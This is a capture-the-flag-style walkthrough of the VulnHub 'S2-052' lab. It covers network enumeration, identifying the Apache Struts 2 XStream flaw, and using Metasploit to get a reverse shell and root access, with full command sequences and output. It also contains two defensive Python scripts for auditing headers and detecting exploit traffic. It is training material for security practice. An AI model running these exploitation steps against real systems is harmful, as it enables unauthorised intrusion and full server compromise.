Pentester Lab: S2-052 || VulnHub PentesterLab Walkthrough

Hello, everyone! Thank you for tuning in to our latest video. Today, we're continuing our tutorial series on vulnerable machines from "PentesterLab". Our target for this session is the machine labeled "s2-052".

To get started, you'll need to grab the vulnerable image from VulnHub's website. If you're new to VulnHub, don't worry; you can check out our previous videos in the VulnHub playlist for a primer.

Pentester Lab S2.052

Pentester Lab S2.052 is a vulnerable virtual machine hosted on Vulnhub. It provides an environment for practicing penetration testing skills and learning about various security vulnerabilities.

Once you have the image, setting up the virtual machine (VM) in VirtualBox is our next step.


Setting Up

In this section, we're going to guide you through setting up a new virtual machine (VM) in VirtualBox. Since the file we've downloaded comes in ".iso" format, the first step is creating a new VM and attaching the ISO to it.

Begin by launching VirtualBox.

Then, click on "New" to initiate the creation of a new virtual machine (VM). 

Here, we'll need to specify the virtual machine name, operating system type, and version. From the VulnHub page, we know that the vulnerable ISO is Linux-based.

Click Next to customize the hardware settings by adjusting the RAM and virtual CPU count.

Click Next, and you'll be prompted to create a new virtual hard disk. This step allows you to allocate storage space according to your requirements. 

After configuring the disk, click "Next" to review and confirm the settings chosen in the earlier steps.

Finally, click "Finish" to complete the creation of your VM. Once the VM is created, you'll see it listed in the VirtualBox Manager. 

Now, let's organize it by grouping it under "PentesterLab".

Now, let's configure the settings. 

Select the VM, click on "Settings", and navigate to the storage settings. 

Here, add the ISO image as the optical drive.

Now, change the network adapter to "Host-only adapter" in network settings.

It's important to ensure that both your Kali Linux machine, which I use for performing the attacks, and the vulnerable machine are connected to the same host-only network.

With everything set up, it's time to start the Virtual Machines. 

You'll notice that the Vulnerable Machine is ready, displaying a shell prompt for input. However, our goal is to access it from the Kali machine. 

Let's dive into the fun!

 

Enumeration

Enumeration is the first phase of our attack. Here it is aimed at identifying the IP address of the target machine using netdiscover.

To do this, open a terminal and run "sudo netdiscover -i eth1", where eth1 is the name of the host-only network interface on the Kali machine.

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1

 Currently scanning: 192.168.103.0/16   |   Screen View: Unique Hosts                                                                   
                                                                                                                                        
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                        
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.95.1    0a:00:27:00:00:02      1      60  Unknown vendor                                                                       
 192.168.95.2    08:00:27:02:66:ef      1      60  PCS Systemtechnik GmbH                                                               
 192.168.95.4    08:00:27:ba:a8:5e      1      60  PCS Systemtechnik GmbH

From the scan result, we have obtained our target IP address: "192.168.95.4".

Next, we move on to a port scan to identify open ports. This step is crucial for understanding the attack surface and planning targeted attacks. We'll use the widely-used Nmap tool for this task. Execute "nmap -A" followed by the IP address.

The "-A" flag enables aggressive scanning (OS detection, version detection, default NSE scripts, and traceroute), which gives insight into the service versions running on each open port. Note that it still scans Nmap's default top 1000 TCP ports, as the "Not shown: 999 closed tcp ports" line below confirms.

┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.95.4    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-25 23:22 IST
Nmap scan report for 192.168.95.4
Host is up (0.0015s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-title: Orders
|_Requested resource was /orders.xhtml
|_http-server-header: Apache-Coyote/1.1
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.18 seconds
                                                                                                                                         
┌──(kali㉿kali)-[~]
└─$

After conducting the network scan, we spotted one open port.

Specifically, port 80/TCP is running an HTTP service (Apache Tomcat's Coyote connector, with the web application's landing page at /orders.xhtml). This suggests the presence of a vulnerable web application.

So let's take a look at the web content running on port 80. To inspect it ourselves, open a web browser of your choice and navigate to the target's IP address in the URL bar.

Upon examining the webpage, there appears to be a potential vulnerability. Let's utilize the Nikto command line tool to identify it.

┌──(kali㉿kali)-[~]
└─$ nikto -h http://192.168.95.4/orders.xhtml
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.95.4
+ Target Hostname:    192.168.95.4
+ Target Port:        80
+ Start Time:         2024-04-25 23:23:52 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ /orders.xhtml/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /orders.xhtml/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /orders.xhtml: Cookie JSESSIONID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ : Server banner changed from 'Apache-Coyote/1.1' to 'Apache/2.2.21 (Unix) DAV/2'.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS .
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ 8101 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2024-04-25 23:24:37 (GMT5.5) (45 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                                                                                                                                         
┌──(kali㉿kali)-[~]
└─$ 

If you're unfamiliar with Nikto, we've covered it in a previous video. Feel free to check it out for more information.

Nikto Web Application Security Scanner

This article delves into Nikto, a widely used web application security scanner. Nikto is designed to identify various vulnerabilities and misconfigurations in web servers and web applications, making it an essential tool for security professionals.


After analyzing the results, we've uncovered a MIME content-type weakness (the X-Content-Type-Options header is not set), along with a session cookie created without the HttpOnly flag and PUT/DELETE methods advertised by the server.
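The Nikto findings above (missing X-Frame-Options, missing X-Content-Type-Options, JSESSIONID without HttpOnly, and PUT/DELETE in the Allow header) are all things you can verify and regression-test from a raw HTTP response yourself. The following Python script is an added example, not part of the original post or of Nikto: it parses a constructed response that mirrors the target's headers, reports each gap, and shows a hardened response passing clean. The Secure-flag check goes beyond the Nikto output and is only applied when the caller says the application is served over TLS, since the flag would break cookies on a plain HTTP site like this one.

```python
"""Audit an HTTP response for the hardening gaps Nikto reported (added example)."""
from typing import List, Set, Tuple

Header = Tuple[str, str]

# Constructed response mirroring the Nikto findings (not captured from the
# target): Coyote banner, JSESSIONID without HttpOnly, no X-Frame-Options,
# no X-Content-Type-Options, and an Allow header advertising PUT/DELETE.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache-Coyote/1.1\r\n"
    "Set-Cookie: JSESSIONID=0123456789ABCDEF; Path=/\r\n"
    "Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS\r\n"
    "Content-Type: text/html;charset=UTF-8\r\n"
    "\r\n"
    "<html><title>Orders</title></html>"
)

# The same response after hardening (constructed).
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache-Coyote/1.1\r\n"
    "Set-Cookie: JSESSIONID=0123456789ABCDEF; Path=/; HttpOnly; Secure; SameSite=Lax\r\n"
    "Allow: GET, HEAD, POST, OPTIONS\r\n"
    "X-Frame-Options: DENY\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Content-Type: text/html;charset=UTF-8\r\n"
    "\r\n"
    "<html><title>Orders</title></html>"
)

RISKY_METHODS = {"PUT", "DELETE", "TRACE", "CONNECT"}


def parse_headers(raw: str) -> List[Header]:
    """Split a raw HTTP response into (name, value) pairs; names are lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: List[Header] = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return headers


def cookie_attrs(value: str) -> Tuple[str, Set[str]]:
    """Return (cookie name, lower-cased attribute names) from a Set-Cookie value."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    return name, attrs


def audit_response(raw: str, served_over_tls: bool = False) -> List[str]:
    """Return a list of human-readable findings; an empty list means no gaps."""
    headers = parse_headers(raw)
    names = {n for n, _ in headers}
    findings: List[str] = []

    # Clickjacking: need X-Frame-Options or a CSP frame-ancestors directive.
    csp_frames = any(n == "content-security-policy" and "frame-ancestors" in v.lower()
                     for n, v in headers)
    if "x-frame-options" not in names and not csp_frames:
        findings.append("missing X-Frame-Options (and no CSP frame-ancestors): clickjacking")

    # MIME sniffing: the header must be present exactly once with the value 'nosniff'.
    xcto = [v.lower() for n, v in headers if n == "x-content-type-options"]
    if xcto != ["nosniff"]:
        findings.append("missing or wrong X-Content-Type-Options: nosniff: MIME sniffing")

    # Cookie flags: HttpOnly always; Secure only once the application is on TLS.
    for n, v in headers:
        if n == "set-cookie":
            cname, attrs = cookie_attrs(v)
            if "httponly" not in attrs:
                findings.append(f"cookie {cname} set without HttpOnly")
            if served_over_tls and "secure" not in attrs:
                findings.append(f"cookie {cname} set without Secure")

    # Allowed methods: PUT/DELETE let clients write or remove resources.
    for n, v in headers:
        if n == "allow":
            risky = sorted(RISKY_METHODS & {m.strip().upper() for m in v.split(",")})
            if risky:
                findings.append("Allow header advertises " + ", ".join(risky))
    return findings


if __name__ == "__main__":
    for finding in audit_response(WEAK_RESPONSE):
        print("WEAK:", finding)
    print("hardened findings:", audit_response(HARDENED_RESPONSE, served_over_tls=True))
```

Run it as-is to see the four findings for the weak response and an empty list for the hardened one; point `WEAK_RESPONSE` at a response you capture (for example with `curl -i`) to audit a real server.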

However, these findings alone don't provide much insight into the application itself. To conduct a more thorough scan and uncover additional vulnerabilities, I'll use Acunetix.

To launch the Acunetix dashboard, simply run the command "service acunetix start" in your terminal. 

┌──(kali㉿kali)-[~]
└─$ service acunetix start

This will initiate the Acunetix server on Port 3443 on localhost. 

If Acunetix isn't available, alternatives like OpenVAS or Nessus can be utilized.

Mastering OpenVAS: Scanning Vulnerable Environments

This in-depth guide covers the process of mastering OpenVAS for scanning vulnerable environments. OpenVAS is a powerful open-source vulnerability scanner used for identifying security issues in networks and systems.

For those interested in installing Acunetix on Kali for free, check out the blog link provided below this video.

Installing Acunetix on Kali Linux with Docker

This tutorial provides a detailed guide on how to install Acunetix on Kali Linux using Docker. Acunetix is a powerful web vulnerability scanner, and Docker provides a convenient way to set up and manage software environments.

Once on the Acunetix dashboard page, navigate to "Targets" and select "Add target" to begin scanning. 

Enter the target URL (http://192.168.95.4/) and save the target.



No further adjustments are necessary; simply click "Scan" to initiate the process. 

From here, you can customize the scanning options to your preference. For instance, I've chosen a full scan type. After configuring the options, simply click "Create scan" to initiate the scanning process.

The scanning process has begun, and you can monitor its progress in the Activity section through the progress bar.

However, as the scanning is consuming considerable time, I'll halt it momentarily. I believe I've already identified the vulnerability.

It appears to be the Apache Struts 2 REST plugin XStream remote code execution vulnerability (S2-052).

Here you will find detailed information regarding this vulnerability, offering further insight. Take a look if you wish to dig deeper.
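S2-052 is triggered when the Struts REST plugin hands an XML request body to XStream for deserialization, so from the defender's side the signal to look for is an XML-bodied POST/PUT arriving at a REST-mapped action such as /orders/3/edit on an application that only ever expects form posts or JSON. The following Python script is an added example, not part of the original post or of any Struts tooling: it runs that check over constructed Tomcat access-log lines. It assumes the AccessLogValve pattern was extended with `"%{Content-Type}i"` so the request Content-Type is logged, and it assumes `/orders` is the REST resource prefix (both assumptions, chosen to match this lab).

```python
"""Flag XML-bodied writes to Struts REST actions in Tomcat access logs (added example)."""
import re
from typing import List, NamedTuple, Optional

# Constructed log lines (not from the original post). Assumed AccessLogValve
# pattern: %h %l %u %t "%r" %s %b "%{Content-Type}i"
SAMPLE_LOG = """\
192.168.95.3 - - [25/Apr/2024:23:58:10 +0530] "GET /orders.xhtml HTTP/1.1" 200 1532 "-"
192.168.95.3 - - [25/Apr/2024:23:58:41 +0530] "POST /orders/3/edit HTTP/1.1" 200 823 "application/xml"
192.168.95.3 - - [25/Apr/2024:23:59:02 +0530] "POST /orders/3 HTTP/1.1" 302 0 "application/x-www-form-urlencoded"
192.168.95.3 - - [25/Apr/2024:23:59:30 +0530] "GET /orders/3.xml HTTP/1.1" 200 410 "-"
192.168.95.3 - - [26/Apr/2024:00:00:12 +0530] "PUT /orders/3 HTTP/1.1" 500 0 "text/xml; charset=UTF-8"
"""

LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<ctype>[^"]*)"$'
)

# Methods that carry a request body the REST plugin will try to unmarshal.
BODY_METHODS = {"POST", "PUT", "PATCH"}
XML_TYPES = ("application/xml", "text/xml")
# Assumption: the REST-mapped resource prefix for this application.
REST_PATH_RE = re.compile(r"^/orders(/|$)")


class Hit(NamedTuple):
    host: str
    time: str
    method: str
    path: str
    content_type: str
    status: int


def parse_line(line: str) -> Optional[dict]:
    """Parse one access-log line into its fields, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def is_xml_body(content_type: str) -> bool:
    """True for XML media types, including structured-syntax suffixes like +xml."""
    main = content_type.split(";", 1)[0].strip().lower()
    return main in XML_TYPES or main.endswith("+xml")


def find_xml_rest_writes(log_text: str, rest_path_re=REST_PATH_RE) -> List[Hit]:
    """Return every body-carrying XML request aimed at a REST action path."""
    hits: List[Hit] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue   # unparseable line: skip rather than crash the sweep
        if (rec["method"] in BODY_METHODS
                and rest_path_re.match(rec["path"])
                and is_xml_body(rec["ctype"])):
            hits.append(Hit(rec["host"], rec["time"], rec["method"], rec["path"],
                            rec["ctype"], int(rec["status"])))
    return hits


if __name__ == "__main__":
    for hit in find_xml_rest_writes(SAMPLE_LOG):
        print(f"ALERT {hit.time} {hit.host} {hit.method} {hit.path} "
              f"ctype={hit.content_type!r} status={hit.status}")
```

GET requests for `.xml` representations are deliberately not flagged: the plugin only unmarshals request bodies, so read-only XML responses are normal traffic. A form-encoded POST to the same path is likewise normal. An alert is a prompt to check whether the application needs XML input at all; if it does not, the durable fix is upgrading Struts to a version that addresses S2-052 or disabling the REST plugin's XML handling, not just watching the logs.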

Now that we've identified the vulnerability, it's time to move on to the exploitation step.

 

Exploitation

To exploit this vulnerability, we'll use the Metasploit console (msfconsole), which can be launched from the Kali menu.

Once opened, you'll find yourself in the MSF6 console. 

$ sudo msfdb init && msfconsole
[sudo] password for kali: 
[i] Database already started
[i] The database appears to be already configured, skipping initialization
Metasploit tip: Enable verbose logging with set VERBOSE true
                                                  
                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##
                            https://metasploit.com


       =[ metasploit v6.4.5-dev                           ]
+ -- --=[ 2413 exploits - 1239 auxiliary - 423 post       ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 >

Here, we'll search for the vulnerability "s2-052".

msf6 > search s2-052

Matching Modules
================

   #  Name                                     Disclosure Date  Rank       Check  Description
   -  ----                                     ---------------  ----       -----  -----------
   0  exploit/multi/http/struts2_rest_xstream  2017-09-05       excellent  Yes    Apache Struts 2 REST Plugin XStream RCE
   1    \_ target: Unix (In-Memory)            .                .          .      .
   2    \_ target: Windows (In-Memory)         .                .          .      .
   3    \_ target: Python (In-Memory)          .                .          .      .
   4    \_ target: PowerShell (In-Memory)      .                .          .      .
   5    \_ target: Linux (Dropper)             .                .          .      .
   6    \_ target: Windows (Dropper)           .                .          .      .


Interact with a module by name or index. For example info 6, use 6 or use exploit/multi/http/struts2_rest_xstream
After interacting with a module you can manually set a TARGET with set TARGET 'Windows (Dropper)'

msf6 >

The search result shows one module, exploit/multi/http/struts2_rest_xstream, with six targets tailored to different operating systems and delivery methods (in-memory versus dropper). We already know the OS is Linux, but to confirm it we can run Nmap's OS detection ("sudo nmap -O"). Here Linux is confirmed.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -O 192.168.95.4
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-25 23:36 IST
Nmap scan report for 192.168.95.4
Host is up (0.00046s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:BA:A8:5E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.10 seconds
                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

To proceed, execute "use 5" to select the module with the "Linux (Dropper)" target; a default payload is selected automatically.

msf6 > use 5
[*] Additionally setting TARGET => Linux (Dropper)
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/struts2_rest_xstream) >

Next, utilize the "options" command to display the required parameters for the attack.

msf6 exploit(multi/http/struts2_rest_xstream) > options 

Module options (exploit/multi/http/struts2_rest_xstream):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
                                                         cs/using-metasploit.html
   RPORT      8080                             yes       The target port (TCP)
   SSL        false                            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /struts2-rest-showcase/orders/3  yes       Path to Struts action
   URIPATH                                     no        The URI to use for this exploit (default is random)
   VHOST                                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine o
                                       r 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   Linux (Dropper)



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/struts2_rest_xstream) >

Here, we need to provide RHOST, RPORT, TARGETURI, LHOST, and LPORT. In some cases we also have to set SRVHOST and SRVPORT, because the dropper target makes the victim fetch the payload from a small web server that Metasploit starts on the attacking machine.

msf6 exploit(multi/http/struts2_rest_xstream) > set RHOST 192.168.95.4
RHOST => 192.168.95.4
msf6 exploit(multi/http/struts2_rest_xstream) > set RPORT 80
RPORT => 80
msf6 exploit(multi/http/struts2_rest_xstream) > set TARGETURI /orders/3/edit
TARGETURI => /orders/3/edit
msf6 exploit(multi/http/struts2_rest_xstream) > set LHOST 192.168.95.3
LHOST => 192.168.95.3
msf6 exploit(multi/http/struts2_rest_xstream) > set LPORT 443
LPORT => 443
msf6 exploit(multi/http/struts2_rest_xstream) > set SRVHOST 192.168.95.3
SRVHOST => 192.168.95.3
msf6 exploit(multi/http/struts2_rest_xstream) > set SRVPORT 443
SRVPORT => 443
msf6 exploit(multi/http/struts2_rest_xstream) >

With the configuration complete, we're ready to establish a foothold on the server. Let's proceed.

 

Foothold

Run the "exploit" command; if it succeeds, we obtain a shell.

msf6 exploit(multi/http/struts2_rest_xstream) > exploit

[*] Started reverse TCP handler on 192.168.95.3:443 
[*] Command Stager progress - 100.00% done (823/823 bytes)
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/struts2_rest_xstream) > 

Upon running "exploit", we encountered the message: "Exploit completed, but no session was created."

Now, let's carefully review the options to ensure everything is configured correctly. Upon verification, all settings appear to be in order, so the issue most likely lies with the selected payload. One common cause is a payload that does not match the target's architecture: the default linux/x64/meterpreter/reverse_tcp only runs on a 64-bit system, and the command stager reports 100% even when the delivered binary never executes.

Let's address this by selecting a different payload.

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.95.3     yes       The listen address (an interface may be specified)
   LPORT  443              yes       The listen port


View the full module info with the info, or info -d command.

Run "show payloads" to view the payloads compatible with this module and target.

msf6 exploit(multi/http/struts2_rest_xstream) > show payloads 

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                            .                normal  No     Custom Payload
   1   payload/generic/debug_trap                        .                normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_aws_ssm                .                normal  No     Command Shell, Bind SSM (via AWS API)
   3   payload/generic/shell_bind_tcp                    .                normal  No     Generic Command Shell, Bind TCP Inline
   4   payload/generic/shell_reverse_tcp                 .                normal  No     Generic Command Shell, Reverse TCP Inline
   5   payload/generic/ssh/interact                      .                normal  No     Interact with Established SSH Connection
   6   payload/generic/tight_loop                        .                normal  No     Generic x86 Tight Loop
   7   payload/linux/x64/exec                            .                normal  No     Linux Execute Command
   8   payload/linux/x64/meterpreter/bind_tcp            .                normal  No     Linux Mettle x64, Bind TCP Stager
   9   payload/linux/x64/meterpreter/reverse_sctp        .                normal  No     Linux Mettle x64, Reverse SCTP Stager
   10  payload/linux/x64/meterpreter/reverse_tcp         .                normal  No     Linux Mettle x64, Reverse TCP Stager
   11  payload/linux/x64/meterpreter_reverse_http        .                normal  No     Linux Meterpreter, Reverse HTTP Inline
   12  payload/linux/x64/meterpreter_reverse_https       .                normal  No     Linux Meterpreter, Reverse HTTPS Inline
   13  payload/linux/x64/meterpreter_reverse_tcp         .                normal  No     Linux Meterpreter, Reverse TCP Inline
   14  payload/linux/x64/pingback_bind_tcp               .                normal  No     Linux x64 Pingback, Bind TCP Inline
   15  payload/linux/x64/pingback_reverse_tcp            .                normal  No     Linux x64 Pingback, Reverse TCP Inline
   16  payload/linux/x64/shell/bind_tcp                  .                normal  No     Linux Command Shell, Bind TCP Stager
   17  payload/linux/x64/shell/reverse_sctp              .                normal  No     Linux Command Shell, Reverse SCTP Stager
   18  payload/linux/x64/shell/reverse_tcp               .                normal  No     Linux Command Shell, Reverse TCP Stager
   19  payload/linux/x64/shell_bind_ipv6_tcp             .                normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   20  payload/linux/x64/shell_bind_tcp                  .                normal  No     Linux Command Shell, Bind TCP Inline
   21  payload/linux/x64/shell_bind_tcp_random_port      .                normal  No     Linux Command Shell, Bind TCP Random Port Inline
   22  payload/linux/x64/shell_reverse_ipv6_tcp          .                normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   23  payload/linux/x64/shell_reverse_tcp               .                normal  No     Linux Command Shell, Reverse TCP Inline
   24  payload/linux/x86/chmod                           .                normal  No     Linux Chmod
   25  payload/linux/x86/exec                            .                normal  No     Linux Execute Command
   26  payload/linux/x86/meterpreter/bind_ipv6_tcp       .                normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   27  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid  .                normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   28  payload/linux/x86/meterpreter/bind_nonx_tcp       .                normal  No     Linux Mettle x86, Bind TCP Stager
   29  payload/linux/x86/meterpreter/bind_tcp            .                normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   30  payload/linux/x86/meterpreter/bind_tcp_uuid       .                normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   31  payload/linux/x86/meterpreter/reverse_ipv6_tcp    .                normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   32  payload/linux/x86/meterpreter/reverse_nonx_tcp    .                normal  No     Linux Mettle x86, Reverse TCP Stager
   33  payload/linux/x86/meterpreter/reverse_tcp         .                normal  No     Linux Mettle x86, Reverse TCP Stager
   34  payload/linux/x86/meterpreter/reverse_tcp_uuid    .                normal  No     Linux Mettle x86, Reverse TCP Stager
   35  payload/linux/x86/meterpreter_reverse_http        .                normal  No     Linux Meterpreter, Reverse HTTP Inline
   36  payload/linux/x86/meterpreter_reverse_https       .                normal  No     Linux Meterpreter, Reverse HTTPS Inline
   37  payload/linux/x86/meterpreter_reverse_tcp         .                normal  No     Linux Meterpreter, Reverse TCP Inline
   38  payload/linux/x86/metsvc_bind_tcp                 .                normal  No     Linux Meterpreter Service, Bind TCP
   39  payload/linux/x86/metsvc_reverse_tcp              .                normal  No     Linux Meterpreter Service, Reverse TCP Inline
   40  payload/linux/x86/read_file                       .                normal  No     Linux Read File
   41  payload/linux/x86/shell/bind_ipv6_tcp             .                normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   42  payload/linux/x86/shell/bind_ipv6_tcp_uuid        .                normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   43  payload/linux/x86/shell/bind_nonx_tcp             .                normal  No     Linux Command Shell, Bind TCP Stager
   44  payload/linux/x86/shell/bind_tcp                  .                normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   45  payload/linux/x86/shell/bind_tcp_uuid             .                normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   46  payload/linux/x86/shell/reverse_ipv6_tcp          .                normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   47  payload/linux/x86/shell/reverse_nonx_tcp          .                normal  No     Linux Command Shell, Reverse TCP Stager
   48  payload/linux/x86/shell/reverse_tcp               .                normal  No     Linux Command Shell, Reverse TCP Stager
   49  payload/linux/x86/shell/reverse_tcp_uuid          .                normal  No     Linux Command Shell, Reverse TCP Stager
   50  payload/linux/x86/shell_bind_ipv6_tcp             .                normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   51  payload/linux/x86/shell_bind_tcp                  .                normal  No     Linux Command Shell, Bind TCP Inline
   52  payload/linux/x86/shell_bind_tcp_random_port      .                normal  No     Linux Command Shell, Bind TCP Random Port Inline
   53  payload/linux/x86/shell_reverse_tcp               .                normal  No     Linux Command Shell, Reverse TCP Inline
   54  payload/linux/x86/shell_reverse_tcp_ipv6          .                normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

msf6 exploit(multi/http/struts2_rest_xstream) >

In this case, I'll choose "payload/linux/x86/shell/reverse_tcp".

msf6 exploit(multi/http/struts2_rest_xstream) > set payload payload/linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(multi/http/struts2_rest_xstream) >

After selecting the new payload, run the "options" command to ensure all necessary parameters are correctly configured.

msf6 exploit(multi/http/struts2_rest_xstream) > options

Module options (exploit/multi/http/struts2_rest_xstream):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.95.4     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasplo
                                         it.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /orders/3/edit   yes       Path to Struts action
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.95.3     yes       The local host or network interface to listen on. This must be an address on the local machine or
                                        0.0.0.0 to listen on all addresses.
   SRVPORT  443              yes       The local port to listen on.


Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.95.3     yes       The listen address (an interface may be specified)
   LPORT  443              yes       The listen port


View the full module info with the info, or info -d command.

msf6 exploit(multi/http/struts2_rest_xstream) > show targets 

Exploit targets:
=================

    Id  Name
    --  ----
    4   Linux (Dropper)


msf6 exploit(multi/http/struts2_rest_xstream) >

With everything in order, execute the “exploit” command once more, and observe the results. 

msf6 exploit(multi/http/struts2_rest_xstream) > exploit

[*] Started reverse TCP handler on 192.168.95.3:443 
[*] Sending stage (36 bytes) to 192.168.95.4
[*] Command Stager progress - 100.00% done (763/763 bytes)
[*] Command shell session 1 opened (192.168.95.3:443 -> 192.168.95.4:59568) at 2024-04-26 00:01:04 +0530

Success! It appears the exploit has worked.

ls
apache-tomcat-6.0.41
bootlocal.sh
bootsync.sh
jre1.8.0_20
shutdown.sh
tcemirror

Finally, we've successfully established a foothold on the server. Confirm this by running "whoami" to check whether we have root privileges.

whoami
root

Indeed, we do have root access.

Since we've achieved our objective without encountering any privilege escalation issues, there's no need to proceed further.

If you have any questions or concerns, feel free to leave them in the comments section below.
